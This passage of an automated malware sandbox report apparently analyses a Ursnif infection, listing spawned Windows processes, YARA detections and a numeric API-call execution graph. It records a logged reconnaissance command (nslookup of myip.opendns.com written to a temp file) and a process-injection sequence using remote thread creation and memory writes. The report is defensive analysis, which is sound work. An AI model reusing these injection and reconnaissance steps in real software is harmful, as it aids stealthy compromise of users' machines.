                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE214.tmp' 'c:\Users\user\AppData\Local\Temp\iaweong2\CSC9F4D0947F3074F27AD7E2B0574F6C6A.TMP'
                                                                                                                                                    Imagebase:0x7ff6390b0000
                                                                                                                                                    File size:47280 bytes
                                                                                                                                                    MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:20:36:01
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Windows\System32\control.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\control.exe -h
                                                                                                                                                    Imagebase:0x7ff6f9750000
                                                                                                                                                    File size:117760 bytes
                                                                                                                                                    MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Start time:20:36:03
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                                                                                                                    Imagebase:0x7ff6add60000
                                                                                                                                                    File size:69632 bytes
                                                                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Start time:20:36:05
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:
                                                                                                                                                    Imagebase:0x7ff6fee60000
                                                                                                                                                    File size:3933184 bytes
                                                                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000002.1311153355.0000000004DDE000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                    General

                                                                                                                                                    Start time:20:36:20
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:
                                                                                                                                                    Imagebase:0x7ff6b0ff0000
                                                                                                                                                    File size:99272 bytes
                                                                                                                                                    MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000002.1296954401.0000027D4F83E000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                    General

                                                                                                                                                    Start time:20:36:24
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:
                                                                                                                                                    Imagebase:0x7ff6b0ff0000
                                                                                                                                                    File size:99272 bytes
                                                                                                                                                    MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000002.1296813994.000001B4FAD4E000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                    General

                                                                                                                                                    Start time:20:36:27
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\8F31.bi1'
                                                                                                                                                    Imagebase:0x7ff622070000
                                                                                                                                                    File size:273920 bytes
                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Start time:20:36:28
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:
                                                                                                                                                    Imagebase:0x7ff6b0ff0000
                                                                                                                                                    File size:99272 bytes
                                                                                                                                                    MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.1294500412.000001DA4C27E000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                    General

                                                                                                                                                    Start time:20:36:30
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff724c50000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Start time:20:36:31
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Windows\System32\nslookup.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:nslookup myip.opendns.com resolver1.opendns.com
                                                                                                                                                    Imagebase:0x7ff71c1b0000
                                                                                                                                                    File size:86528 bytes
                                                                                                                                                    MD5 hash:AF1787F1DBE0053D74FC687E7233F8CE
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >

                                                                                                                                                      Executed Functions

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000017.00000003.842890453.0000022B0FFB0000.00000010.00000001.sdmp, Offset: 0000022B0FFB0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_23_3_22b0ffb0000_mshta.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                      • Instruction ID: e9a7e713c9de71e459febeeecc033adcd4c87883712f21df95f27bd3cab932ab
                                                                                                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                      • Instruction Fuzzy Hash: 6390020479A40A65D41611D10C4D25E5140A398291FD44580441690144DD4D43961192
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000017.00000003.842890453.0000022B0FFB0000.00000010.00000001.sdmp, Offset: 0000022B0FFB0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_23_3_22b0ffb0000_mshta.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                      • Instruction ID: e9a7e713c9de71e459febeeecc033adcd4c87883712f21df95f27bd3cab932ab
                                                                                                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                      • Instruction Fuzzy Hash: 6390020479A40A65D41611D10C4D25E5140A398291FD44580441690144DD4D43961192
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:7.8%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:24.2%
                                                                                                                                                      Total number of Nodes:1297
                                                                                                                                                      Total number of Limit Nodes:65

                                                                                                                                                      Graph

                                                                                                                                                      execution_graph 15544 4dc555d 15545 4dad19c 4 API calls 15544->15545 15547 4dc556c 15545->15547 15546 4dc5b75 15549 4dc5c97 15546->15549 15550 4dcf704 4 API calls 15546->15550 15547->15546 15548 4dcf704 4 API calls 15547->15548 15548->15546 15550->15549 14868 4da1edc 14869 4da1f01 14868->14869 14871 4da1f4a 14869->14871 14872 4dbb520 14869->14872 14878 4dbb552 14872->14878 14879 4dbb81c 14872->14879 14873 4dbb9f4 14873->14871 14874 4dbb814 14876 4da7148 5 API calls 14874->14876 14874->14879 14876->14879 14878->14874 14878->14879 14880 4da7148 14878->14880 14879->14873 14884 4dc1534 14879->14884 14881 4da717e 14880->14881 14888 4dbabac 14881->14888 14883 4da71b3 14883->14874 14887 4dc156e 14884->14887 14885 4dc17a3 14885->14873 14886 4dcf04c CallNamedPipeA 14886->14885 14887->14885 14887->14886 14891 4dbabde 14888->14891 14889 4dbaccd 14889->14883 14891->14889 14892 4dac4e4 14891->14892 14894 4dac6bd 14892->14894 14896 4dac524 14892->14896 14894->14891 14896->14894 14897 4db9380 14896->14897 14910 4db056c 14896->14910 14900 4db93b6 14897->14900 14898 4daa564 3 API calls 14898->14900 14899 4db96ab 14901 4db99b7 14899->14901 14907 4dcf04c CallNamedPipeA 14899->14907 14900->14898 14900->14899 14902 4db9ab1 14901->14902 14903 4db217c gethostbyname 14901->14903 14905 4dcf04c CallNamedPipeA 14901->14905 14904 4dcf04c CallNamedPipeA 14902->14904 14909 4db9b93 14902->14909 14903->14901 14904->14902 14905->14901 14906 4db9c61 14906->14896 14907->14899 14908 4dcf04c CallNamedPipeA 14908->14909 14909->14906 14909->14908 14911 4db059d 14910->14911 14913 4db0645 14911->14913 14914 4daae04 14911->14914 14913->14896 14917 4daae5f 14914->14917 14915 4dab026 14915->14913 14916 4db9380 5 API calls 14916->14915 14917->14915 14917->14916 15106 4daa45c 15107 4daa4a3 15106->15107 15108 4da9f98 5 API calls 15107->15108 15109 4daa519 15107->15109 15108->15109 15110 4dbae5c 15111 4dbaf6c GetTempFileNameA 15110->15111 15113 4dbae70 15111->15113 15112 4dbae78 15113->15112 15114 4dacd9c 5 API calls 15113->15114 15114->15112 14918 4dc56d4 14920 4dc56de 14918->14920 14921 4dc5b2c 14920->14921 14924 4da5d98 14920->14924 14922 4dc5c97 14921->14922 14923 4dcf704 4 API calls 14921->14923 14923->14922 14925 4da5dc2 14924->14925 14926 4dc10cc 2 API calls 14925->14926 14927 4da5e23 14925->14927 14926->14927 14927->14921 15356 4dcfdd4 15357 4dcfe05 15356->15357 15358 4dcfe85 15357->15358 15359 4dcd8d0 5 API calls 15357->15359 15359->15357 15369 4dcf1d0 15370 4dcf1fd 15369->15370 15371 4dc98dc 11 API calls 15370->15371 15372 4dcf236 15370->15372 15371->15372 15373 4da4fd4 15376 4da4ff4 15373->15376 15374 4da517b RegGetValueW 15375 4da51b6 15374->15375 15376->15374 15376->15375 14928 4dc54d3 14933 4dc3930 14928->14933 14931 4dc5c97 14932 4dcf704 4 API calls 14932->14931 14934 4dc395a 14933->14934 14935 4da5d98 2 API calls 14934->14935 14936 4dc39b4 14934->14936 14935->14936 14936->14931 14936->14932 14721 4dc10cc CreateThread 14722 4dc110a QueueUserAPC 14721->14722 14723 4dc111d 14721->14723 14722->14723 14937 4dc74cc 14938 4dc7510 14937->14938 14939 4dc7548 14938->14939 14940 4daa564 3 API calls 14938->14940 14949 4dc76a5 14938->14949 14941 4dc7565 14939->14941 14942 4daa564 3 API calls 14939->14942 14940->14939 14943 4dc77d5 14941->14943 14945 4dc7584 14941->14945 14941->14949 14942->14941 14944 4dc676c 12 API calls 14943->14944 14946 4dc7836 14944->14946 14947 4dc1e58 7 API calls 14945->14947 14945->14949 14948 4db9380 5 API calls 14946->14948 14946->14949 14947->14949 14948->14949 14724 4dbbcc8 RtlAllocateHeap 14725 4dbbd14 14724->14725 15115 4db7448 15116 4dbab00 9 API calls 15115->15116 15117 4db7461 15116->15117 15118 4db8248 15123 4db452c 15118->15123 15120 4db8294 15121 4db3b44 5 API calls 15120->15121 15122 4db82b0 15120->15122 15121->15122 15125 4db4563 15123->15125 15126 4db4695 15125->15126 15127 4dbde80 15125->15127 15126->15120 15128 4dbdeae 15127->15128 15132 4dbdfd0 15128->15132 15133 4da2a54 15128->15133 15130 4dbdf0d 15131 4dcf04c CallNamedPipeA 15130->15131 15130->15132 15131->15132 15132->15126 15134 4da2a7f 15133->15134 15135 4dbabac 5 API calls 15134->15135 15136 4da2af4 15135->15136 15136->15130 15377 4da55c9 15378 4dbebd4 6 API calls 15377->15378 15379 4da55ce 15378->15379 15380 4dc10cc 2 API calls 15379->15380 15383 4da55ef 15379->15383 15380->15383 15381 4dcf04c CallNamedPipeA 15382 4da5d79 15381->15382 15383->15381 15137 4dc5a49 15138 4dc5a59 15137->15138 15140 4dc5aac 15137->15140 15139 4db890c 4 API calls 15138->15139 15139->15140 15141 4dc5c97 15140->15141 15142 4dcf704 4 API calls 15140->15142 15142->15141 14779 4db694c 14780 4db695f 14779->14780 14781 4db6979 RtlExitUserThread 14780->14781 14782 4dcf704 4 API calls 14780->14782 14782->14781 15143 4db1640 15144 4dacd9c 5 API calls 15143->15144 15145 4db165a 15144->15145 14856 4da7944 14857 4da7964 14856->14857 14858 4da798e RtlAllocateHeap 14857->14858 14859 4da79af 14857->14859 14858->14859 14950 4dc5afe 14951 4dc5b0d 14950->14951 14953 4dc5b2c 14950->14953 14952 4da5d98 2 API calls 14951->14952 14951->14953 14952->14953 14954 4dc5c97 14953->14954 14955 4dcf704 4 API calls 14953->14955 14955->14954 15394 4dc59ff 15396 4dc5a0e 15394->15396 15395 4dc5c97 15398 4dc5a30 15396->15398 15400 4dae37c 15396->15400 15397 4dcf704 4 API calls 15397->15395 15398->15395 15398->15397 15401 4dae3a8 15400->15401 15405 4dae475 15401->15405 15406 4da197c 15401->15406 15405->15398 15407 4dbaf6c GetTempFileNameA 15406->15407 15408 4da1992 15407->15408 15408->15405 15409 4db228c 15408->15409 15410 4db22c6 15409->15410 15411 4daa1f4 4 API calls 15410->15411 15412 4db22fd 15410->15412 15411->15412 15412->15405 14179 4dca8f8 14180 4dca9d0 14179->14180 14182 4dca900 14179->14182 14181 4dca9c5 FindCloseChangeNotification 14181->14180 14182->14180 14182->14181 14185 4dbf560 14182->14185 14186 4dbf59a 14185->14186 14187 4dbf604 NtSetInformationProcess 14186->14187 14190 4dbf63c 14186->14190 14193 4dbf5af 14186->14193 14188 4dbf634 14187->14188 14187->14190 14222 4dc5fc4 14188->14222 14191 4dbf6b4 CreateRemoteThread 14190->14191 14190->14193 14192 4dbf6e6 14191->14192 14191->14193 14194 4dbf6f9 14192->14194 14229 4da936c 14192->14229 14193->14181 14201 4da27e8 14194->14201 14198 4dbf721 ResumeThread 14200 4dbf727 FindCloseChangeNotification 14198->14200 14199 4dbf717 14199->14200 14200->14193 14203 4da282a 14201->14203 14202 4da2891 14205 4da28b4 14202->14205 14209 4da2a12 14202->14209 14267 4dcadd4 14202->14267 14203->14202 14238 4dc676c 14203->14238 14235 4dacca0 14205->14235 14209->14198 14209->14199 14210 4da28eb VirtualProtectEx 14211 4da2912 14210->14211 14215 4da292a 14210->14215 14279 4dafb90 14211->14279 14213 4da2941 ResumeThread 14214 4da295c SuspendThread 14213->14214 14214->14215 14215->14209 14215->14213 14217 4da29a1 14215->14217 14216 4da29ab VirtualProtectEx 14216->14209 14220 4da29fa 14216->14220 14217->14216 14219 4dc676c 12 API calls 14217->14219 14219->14216 14221 4dafb90 2 API calls 14220->14221 14221->14209 14320 4dc1ef0 14222->14320 14224 4dc603e 14224->14190 14225 4dc5fe3 14225->14224 14226 4dacca0 NtReadVirtualMemory 14225->14226 14227 4dc600d 14226->14227 14227->14224 14228 4dacca0 NtReadVirtualMemory 14227->14228 14228->14224 14230 4da9398 14229->14230 14231 4da93f6 14230->14231 14232 4dacca0 NtReadVirtualMemory 14230->14232 14231->14194 14233 4da93bf 14232->14233 14233->14231 14234 4db3830 NtWriteVirtualMemory 14233->14234 14234->14231 14236 4daccb4 NtReadVirtualMemory 14235->14236 14237 4da28d7 14235->14237 14236->14237 14237->14209 14237->14210 14241 4dc67ca 14238->14241 14239 4dc6d88 NtUnmapViewOfSection 14240 4dc6d97 14239->14240 14242 4dc6db2 NtClose 14240->14242 14244 4dc67f6 14240->14244 14241->14244 14262 4dc6d27 14241->14262 14283 4db387c 14241->14283 14242->14244 14244->14202 14245 4dc68ba 14245->14262 14289 4dbffcc NtMapViewOfSection 14245->14289 14247 4dc68fb 14248 4dc69cc 14247->14248 14251 4dc6ab8 14247->14251 14247->14262 14260 4dc6a81 14248->14260 14297 4db17b8 14248->14297 14250 4dc6a27 14252 4db17b8 NtReadVirtualMemory 14250->14252 14250->14260 14251->14260 14304 4dbe8c8 14251->14304 14254 4dc6a54 14252->14254 14256 4db17b8 NtReadVirtualMemory 14254->14256 14254->14260 14256->14260 14257 4dbe8c8 4 API calls 14258 4dc6b42 14257->14258 14259 4dbe8c8 4 API calls 14258->14259 14258->14260 14259->14260 14260->14262 14291 4dabab4 14260->14291 14262->14239 14262->14240 14263 4dc6c4c 14263->14262 14294 4db3830 14263->14294 14266 4dc6d13 NtSetContextThread 14266->14262 14268 4dcae05 14267->14268 14269 4dacca0 NtReadVirtualMemory 14268->14269 14278 4dcaf75 14268->14278 14270 4dcae7f 14269->14270 14271 4dacca0 NtReadVirtualMemory 14270->14271 14270->14278 14272 4dcaeb9 14271->14272 14273 4dacca0 NtReadVirtualMemory 14272->14273 14272->14278 14274 4dcaee6 14273->14274 14275 4dacca0 NtReadVirtualMemory 14274->14275 14274->14278 14276 4dcaf40 14275->14276 14277 4dacca0 NtReadVirtualMemory 14276->14277 14276->14278 14277->14278 14278->14205 14280 4db3830 NtWriteVirtualMemory 14279->14280 14281 4dafbc0 VirtualProtectEx 14280->14281 14281->14215 14284 4db38b8 14283->14284 14285 4db39c9 NtCreateSection 14284->14285 14288 4db3a3e 14284->14288 14286 4db3a25 14285->14286 14285->14288 14287 4dbffcc NtMapViewOfSection 14286->14287 14287->14288 14288->14245 14290 4dc001f 14289->14290 14290->14247 14292 4dabaca NtAllocateVirtualMemory 14291->14292 14293 4dabaf7 14291->14293 14292->14293 14293->14263 14295 4db3844 NtWriteVirtualMemory 14294->14295 14296 4db3855 14294->14296 14295->14296 14296->14262 14296->14266 14312 4da97bc 14297->14312 14299 4da97bc NtReadVirtualMemory 14300 4db17f5 14299->14300 14300->14299 14301 4db1868 14300->14301 14302 4dacca0 NtReadVirtualMemory 14301->14302 14303 4db199b 14301->14303 14302->14301 14303->14250 14306 4dbe8f0 14304->14306 14305 4dbe9f6 14305->14257 14305->14260 14306->14305 14307 4dbe973 CreateFileA 14306->14307 14307->14305 14308 4dbe9a8 SetFilePointer 14307->14308 14309 4dbe9ed FindCloseChangeNotification 14308->14309 14310 4dbe9bd ReadFile 14308->14310 14309->14305 14310->14309 14311 4dbe9df 14310->14311 14311->14309 14313 4da980c 14312->14313 14314 4dacca0 NtReadVirtualMemory 14313->14314 14316 4da99c9 14313->14316 14315 4da987c 14314->14315 14315->14316 14317 4dacca0 NtReadVirtualMemory 14315->14317 14316->14300 14319 4da98a1 14317->14319 14318 4dacca0 NtReadVirtualMemory 14318->14319 14319->14316 14319->14318 14321 4dbbcc8 RtlAllocateHeap 14320->14321 14322 4dc1f27 14321->14322 14322->14225 15413 4dce5f8 15418 4da9a44 15413->15418 15416 4db3b44 5 API calls 15417 4dce660 15416->15417 15419 4da9a76 15418->15419 15420 4db452c 5 API calls 15419->15420 15421 4da9acf 15420->15421 15421->15416 15421->15417 15577 4dc7175 15579 4dc71a8 15577->15579 15578 4dc73fe 15579->15578 15580 4dc7350 15579->15580 15583 4dd02bc 15579->15583 15580->15578 15582 4da1e24 10 API calls 15580->15582 15582->15578 15584 4dd02f7 15583->15584 15585 4da7944 RtlAllocateHeap 15584->15585 15586 4dd03a5 15584->15586 15585->15586 15586->15580 14715 4dbf770 14716 4dbf79b 14715->14716 14717 4dbf81e RegisterClassA 14716->14717 14718 4dbf842 CreateWindowExA 14717->14718 14720 4dbf887 14717->14720 14718->14720 14720->14720 15587 4dc5977 15588 4dc5980 15587->15588 15590 4dc59a0 15587->15590 15589 4dcf704 4 API calls 15588->15589 15588->15590 15589->15590 15591 4dc5c97 15590->15591 15592 4dcf704 4 API calls 15590->15592 15592->15591 15422 4dc27f0 15423 4dc282c 15422->15423 15424 4dc0a08 9 API calls 15423->15424 15425 4dc2841 15423->15425 15424->15425 15593 4dc5571 15600 4dbee04 15593->15600 15595 4dc5b75 15598 4dc5c97 15595->15598 15599 4dcf704 4 API calls 15595->15599 15597 4dcf704 4 API calls 15597->15595 15599->15598 15601 4dbee30 15600->15601 15602 4db228c 4 API calls 15601->15602 15603 4dbeea8 15601->15603 15602->15603 15603->15595 15603->15597 14956 4dbf4f4 14958 4dbf51f 14956->14958 14957 4dbf53e 14958->14957 14960 4db3b44 14958->14960 14961 4db3c73 14960->14961 14962 4db3b51 14960->14962 14961->14957 14962->14961 14963 4dbabac 5 API calls 14962->14963 14964 4db3c3a 14963->14964 14964->14961 14965 4dc1534 CallNamedPipeA 14964->14965 14965->14961 15426 4dc7bec 15427 4dc7c0b 15426->15427 15429 4dc7c76 15427->15429 15430 4da203c 15427->15430 15431 4da2075 15430->15431 15432 4da37b8 4 API calls 15431->15432 15433 4da20a1 15432->15433 15434 4da37b8 4 API calls 15433->15434 15435 4da20c6 15434->15435 15436 4da37b8 4 API calls 15435->15436 15437 4da212d 15435->15437 15436->15437 15438 4da37b8 4 API calls 15437->15438 15441 4da21be 15437->15441 15439 4da219d 15438->15439 15440 4da37b8 4 API calls 15439->15440 15440->15441 15442 4da37b8 4 API calls 15441->15442 15445 4da2284 15441->15445 15443 4da224c 15442->15443 15444 4da37b8 4 API calls 15443->15444 15444->15445 15445->15429 15152 4dcf668 15153 4dcf6d9 15152->15153 15154 4dcf6ee 15153->15154 15156 4db7910 15153->15156 15159 4db7949 15156->15159 15157 4da27e8 17 API calls 15158 4db79bd 15157->15158 15158->15154 15159->15157 15159->15158 14726 4da616c 14730 4da618c 14726->14730 14727 4da62e4 14728 4da62bd 14755 4dcdb94 14728->14755 14730->14727 14730->14728 14741 4dc0034 RegOpenKeyA 14730->14741 14732 4da61e4 14748 4dbfc74 14732->14748 14734 4da61f5 14735 4dbfc74 5 API calls 14734->14735 14736 4da6206 RegOpenKeyExW 14735->14736 14737 4da623b 14736->14737 14738 4da6253 RegOpenKeyExW 14736->14738 14737->14738 14739 4da627c 14738->14739 14740 4da6294 RegOpenKeyExW 14738->14740 14739->14740 14740->14728 14742 4dc009b RegQueryValueA 14741->14742 14747 4dc0193 14741->14747 14743 4dc00c4 14742->14743 14746 4dc0101 RegCloseKey 14742->14746 14745 4dc00e2 RegQueryValueA 14743->14745 14743->14746 14745->14746 14746->14747 14747->14732 14759 4db7a04 RegOpenKeyA 14748->14759 14751 4db7a04 RegOpenKeyA 14752 4dbfcf6 14751->14752 14753 4da37b8 4 API calls 14752->14753 14754 4dbfdb2 14752->14754 14753->14754 14754->14734 14757 4dcdbb2 14755->14757 14756 4dcdc3f 14756->14727 14757->14756 14761 4dc0ef0 14757->14761 14760 4db7a42 14759->14760 14760->14751 14760->14754 14762 4dbaf6c GetTempFileNameA 14761->14762 14763 4dc0f23 14762->14763 14764 4dc0f53 14763->14764 14765 4daa1f4 4 API calls 14763->14765 14764->14756 14766 4dc0f3f 14765->14766 14766->14764 14768 4dacd9c 14766->14768 14769 4dbaf6c GetTempFileNameA 14768->14769 14770 4dacdc4 14769->14770 14772 4dacdcc 14770->14772 14773 4da2500 14770->14773 14772->14764 14774 4da2526 14773->14774 14775 4da37b8 4 API calls 14774->14775 14778 4da25e0 14774->14778 14776 4da2587 14775->14776 14777 4da37b8 4 API calls 14776->14777 14776->14778 14777->14778 14778->14772 15160 4db7c6c 15161 4db7c97 15160->15161 15162 4db7c7b 15160->15162 15162->15161 15164 4dca4bc 15162->15164 15166 4dca4f3 15164->15166 15165 4dca52f 15165->15161 15166->15165 15168 4dc6e1c 15166->15168 15170 4dc6e65 15168->15170 15169 4dc6f83 15169->15165 15170->15169 15172 4dcc164 15170->15172 15174 4dcc19b 15172->15174 15173 4dcc255 15173->15169 15174->15173 15176 4dbebd4 6 API calls 15174->15176 15180 4dcc688 15174->15180 15176->15180 15178 4dcc767 15181 4dc0f8c 9 API calls 15178->15181 15179 4dcc71d 15179->15178 15227 4dc20f8 15179->15227 15180->15173 15224 4da91fc 15180->15224 15182 4dcc77e 15181->15182 15237 4db638c 15182->15237 15184 4dcc783 15185 4dcc88b 15184->15185 15186 4dcc80b 15184->15186 15188 4dcc859 15185->15188 15189 4dcc89f 15185->15189 15205 4dcc852 15185->15205 15187 4dcc80d 15186->15187 15186->15188 15190 4dcc84d 15187->15190 15191 4dcc815 15187->15191 15264 4dacb8c 15188->15264 15201 4dcc8dc 15189->15201 15203 4dcc8af 15189->15203 15254 4db671c 15190->15254 15192 4dcc81d 15191->15192 15193 4dcc843 15191->15193 15196 4dcc839 15192->15196 15192->15203 15192->15205 15250 4dc0ad0 15193->15250 15242 4dabf44 15196->15242 15197 4dcc83e 15197->15173 15271 4dce864 15197->15271 15202 4dad064 22 API calls 15201->15202 15201->15205 15202->15205 15203->15205 15260 4dad064 15203->15260 15205->15173 15206 4dc10cc 2 API calls 15205->15206 15207 4dcc9ea 15206->15207 15207->15173 15208 4dcca1f 15207->15208 15209 4dccb54 15207->15209 15211 4dc10cc 2 API calls 15208->15211 15210 4db076c 7 API calls 15209->15210 15218 4dccb4f 15209->15218 15219 4dccb7a 15210->15219 15215 4dcca53 15211->15215 15212 4dccbea 15214 4db076c 7 API calls 15212->15214 15213 4dc10cc 2 API calls 15213->15173 15214->15218 15216 4dcca98 15215->15216 15217 4da6818 6 API calls 15215->15217 15220 4dc10cc 2 API calls 15216->15220 15222 4dccafa 15216->15222 15217->15216 15218->15173 15218->15213 15219->15212 15221 4dcf04c CallNamedPipeA 15219->15221 15220->15222 15221->15212 15222->15173 15222->15218 15276 4db32e4 15222->15276 15225 4db076c 7 API calls 15224->15225 15226 4da9221 15225->15226 15226->15179 15228 4dc211c 15227->15228 15229 4db076c 7 API calls 15228->15229 15232 4dc23ae 15228->15232 15234 4dc24ba 15228->15234 15230 4dc23a2 15229->15230 15230->15232 15280 4dc087c 15230->15280 15233 4db217c gethostbyname 15232->15233 15235 4dc244b 15232->15235 15233->15235 15234->15178 15235->15234 15236 4dc10cc 2 API calls 15235->15236 15236->15234 15238 4dca864 5 API calls 15237->15238 15239 4db63a8 15238->15239 15240 4db63b2 RegQueryValueExA 15239->15240 15241 4db63ee 15239->15241 15240->15241 15241->15184 15243 4dabf62 15242->15243 15244 4da8690 5 API calls 15243->15244 15247 4dac079 15243->15247 15245 4dac002 15244->15245 15246 4dbbcc8 RtlAllocateHeap 15245->15246 15245->15247 15248 4dac039 15246->15248 15247->15197 15248->15247 15249 4da8690 5 API calls 15248->15249 15249->15248 15251 4dc0af9 15250->15251 15252 4da6818 6 API calls 15251->15252 15253 4dc0b19 15251->15253 15252->15253 15253->15197 15258 4db6738 15254->15258 15255 4db68e9 15256 4db6918 15255->15256 15257 4dc10cc 2 API calls 15255->15257 15256->15205 15257->15256 15258->15255 15286 4db237c 15258->15286 15262 4dad080 15260->15262 15261 4dad185 15261->15205 15262->15261 15263 4dbf560 22 API calls 15262->15263 15263->15261 15265 4dacb9f 15264->15265 15266 4dacbd7 15265->15266 15268 4dacbbc 15265->15268 15267 4dacbd5 15266->15267 15294 4da9b84 15266->15294 15267->15197 15270 4da6818 6 API calls 15268->15270 15270->15267 15272 4db076c 7 API calls 15271->15272 15275 4dce880 15272->15275 15273 4dbdc90 5 API calls 15274 4dce8ec 15273->15274 15274->15205 15275->15273 15278 4db3309 15276->15278 15277 4db337e 15277->15218 15278->15277 15304 4da82f0 15278->15304 15281 4dc09dc 15280->15281 15283 4dc089f 15280->15283 15282 4dc1e58 7 API calls 15281->15282 15285 4dc093d 15282->15285 15284 4da5d98 2 API calls 15283->15284 15283->15285 15284->15285 15285->15232 15287 4db23b6 15286->15287 15289 